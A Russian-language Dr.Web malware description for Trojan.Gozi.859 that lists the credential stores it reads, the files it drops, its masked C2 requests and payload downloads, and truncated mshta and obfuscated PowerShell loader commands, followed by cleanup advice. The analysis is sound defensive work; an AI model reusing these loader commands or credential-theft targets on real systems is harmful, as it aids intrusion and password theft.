Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Gozi.859
Добавлен в вирусную базу Dr.Web:
2022-04-23
Описание добавлено:
2022-04-24
Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
%WINDIR%\syswow64\cmd.exe
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами
[<HKCU>\Software\Microsoft\Internet Account Manager]
[<HKLM>\Software\Microsoft\Windows Mail]
[<HKCU>\Software\Microsoft\Windows Mail]
[<HKCU>\Software\Microsoft\Windows Live Mail]
[<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\]
Читает файлы, отвечающие за хранение паролей сторонними программами
%LOCALAPPDATA%\google\chrome\user data\default\login data
Изменения в файловой системе
Создает следующие файлы
%TEMP%\qjxfm0kq.0.cs
%ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
%ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
%ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
%TEMP%\7ce.bin
%TEMP%\6ee.bin\root.pfx
%TEMP%\6ee.bin\disallowed.pfx
%TEMP%\6ee.bin\authroot.pfx
%TEMP%\cce8.bi1
%HOMEPATH%\devicecheck.ps1
%HOMEPATH%\toolbook.lnk
%TEMP%\p1huyfte.dll
%TEMP%\res88bf.tmp
%TEMP%\csc88be.tmp
%TEMP%\p1huyfte.out
%TEMP%\p1huyfte.cmdline
%TEMP%\p1huyfte.0.cs
%TEMP%\qjxfm0kq.dll
%TEMP%\res86eb.tmp
%TEMP%\csc86ea.tmp
%TEMP%\qjxfm0kq.out
%TEMP%\qjxfm0kq.cmdline
%LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
%TEMP%\2610.bin1
Удаляет следующие файлы
%TEMP%\res86eb.tmp
%TEMP%\6ee.bin\disallowed.pfx
%TEMP%\6ee.bin\authroot.pfx
%TEMP%\cce8.bi1
%TEMP%\p1huyfte.pdb
%TEMP%\p1huyfte.dll
%TEMP%\p1huyfte.cmdline
%TEMP%\p1huyfte.0.cs
%TEMP%\6ee.bin\root.pfx
%TEMP%\p1huyfte.out
%TEMP%\res88bf.tmp
%TEMP%\qjxfm0kq.0.cs
%TEMP%\qjxfm0kq.dll
%TEMP%\qjxfm0kq.pdb
%TEMP%\qjxfm0kq.out
%TEMP%\qjxfm0kq.cmdline
%TEMP%\csc86ea.tmp
%TEMP%\csc88be.tmp
%TEMP%\7ce.bin
Изменяет следующие файлы
%APPDATA%\mozilla\firefox\profiles\gn7ryp3k.default\prefs.js
Самоудаляется.
Сетевая активность
Подключается к
'co####.edge.skype.com':80
'14#.#0.35.138':80
'19#.#6.146.148':80
'67.##.234.14':80
TCP
Запросы HTTP GET
http://co####.edge.skype.com/phpadmin/Y1hFUYWP/5SmXL0lC8EsB7F8mRZWt4PY/ZgX4d3Obov/e2EF_2B7ebkaTXJ8K/WyjxY38uPl0g/L0Sfk6QmqGb/2MTOdSHGlOHWIG/cxyLEeb2Qc3M8ggaBsvLv/bZvV40c073zH0h6J/Y2bnfXmowVJdAd...
http://14#.#0.35.138/phpadmin/yMo9xln6HUX/REt4Z9ogd2UY4S/dwlKot0e88gMLKa1okgFM/wE9hwgymRqkPBS8c/A_2FHHCPCfOShab/_2B2HIhjrM4LwpdXqF/ikqS_2FOA/jvBZxhntkwRMBnwBQszy/25YYSIbyVcfJcSoMJrt/I9U7oGGLXXE...
http://14#.#0.35.138/phpadmin/bCia8pk3J80bgJPXOBjp/E2xdaPLYizxubjuP4mn/OGAPs7ZyRBVIm_2Bf79UIH/Wyf6HeyieKmIv/Dch5fS2F/8zvuzsp9JZZ4DKGtTTZJ3JM/JIFheg33XJ/7bsI17dRdcP_2BW3I/y_2FEMFeSzmk/AbgjzidbTE...
http://14#.#0.35.138/phpadmin/exTpZ_2FBzy/Ul00A17VpKAn23/J7_2BMtgFa2gi_2BUw8Dr/Q8B30dYccx4SRgAm/C2uJqHoMtzsOMWm/6uFfBdWeu4lR48d_2B/NfcYATqxX/EZtttS_2FbAXn2PkfoEk/pFf403UAIWoPjXCNEiI/BBCCtsc46Vt...
http://19#.#6.146.148/stilak32.rar
http://19#.#6.146.148/stilak64.rar
http://19#.#6.146.148/cook32.rar
http://19#.#6.146.148/cook64.rar
http://co####.edge.skype.com/images/wzCsM7jDwoanQ/a2rlKn_2/B3_2FAo6cdFkdL9aIT5BdJS/XscH2fhzSU/eIEH2PZqeg6StABEK/V0nGYiZlrC4n/QRTJS6hT9Gx/7uZsRKhIcH_2BA/iOr83L0FtkhodxsNyhDWr/v8Rv5J1qBsdS9sI6/ON...
http://67.##.234.14/images/HSaFMh5e_2Bsmul4FXY/hlczDIFtROFJJ2DIi_2Fci/RQ0Spwkg9HYlS/so3Hgm3_/2BfJeJXAMk2qs7mf_2BP3gY/j41kDnLwuk/PbWeu0rqe6exuLPFX/JnDTuO_2Fy_2/BQ95ydncmZY/XZaHKHrAKC24IE/SvF2bOT...
UDP
DNS ASK co####.edge.skype.com
DNS ASK re#####r1.opendns.com
DNS ASK 22#.###.67.208.in-addr.arpa
DNS ASK my##.#pendns.com
Другое
Ищет следующие окна
ClassName: 'MS_AutodialMonitor' WindowName: ''
ClassName: 'MS_WebCheckMonitor' WindowName: ''
Создает и запускает на исполнение
'<SYSTEM32>\mshta.exe' "about:<hta:application><script>Xbkp='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xbkp).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\294256E3-74A5-4392-C66D-E8275AF19C4B\\...' (со скрытым окном)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' new-alias -name xgpwhwdeo -value gp; new-alias -name qupdrhxuc -value iex; qupdrhxuc ([System.Text.Encoding]::ASCII.GetString((xgpwhwdeo "HKCU:Software\AppDataLow\Software\Microsoft\294256E3-74...' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qjxfm0kq.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES86EB.tmp" "%TEMP%\CSC86EA.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\p1huyfte.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES88BF.tmp" "%TEMP%\CSC88BE.tmp"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C ping localhost -n 5 && del "<Полный путь к файлу>"' (со скрытым окном)
'%WINDIR%\syswow64\cmd.exe' /C pause dll mail, ,' (со скрытым окном)
Запускает на исполнение
'<SYSTEM32>\mshta.exe' "about:<hta:application><script>Xbkp='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xbkp).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\294256E3-74A5-4392-C66D-E8275AF19C4B\\...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' new-alias -name xgpwhwdeo -value gp; new-alias -name qupdrhxuc -value iex; qupdrhxuc ([System.Text.Encoding]::ASCII.GetString((xgpwhwdeo "HKCU:Software\AppDataLow\Software\Microsoft\294256E3-74...
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qjxfm0kq.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES86EB.tmp" "%TEMP%\CSC86EA.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\p1huyfte.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES88BF.tmp" "%TEMP%\CSC88BE.tmp"
'<SYSTEM32>\cmd.exe' /C ping localhost -n 5 && del "<Полный путь к файлу>"
'<SYSTEM32>\cmd.exe' /C "nslookup myip.opendns.com resolver1.opendns.com > %TEMP%\CCE8.bi1"
'<SYSTEM32>\ping.exe' localhost -n 5
'<SYSTEM32>\nslookup.exe' myip.opendns.com resolver1.opendns.com
'<SYSTEM32>\cmd.exe' /C "echo -------- >> %TEMP%\CCE8.bi1"
'<SYSTEM32>\cmd.exe' /C "systeminfo.exe > %TEMP%\2610.bin1"
'<SYSTEM32>\systeminfo.exe'
'%WINDIR%\syswow64\cmd.exe' /C pause dll mail, ,
'<SYSTEM32>\cmd.exe' /C "echo -------- >> %TEMP%\2610.bin1"
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK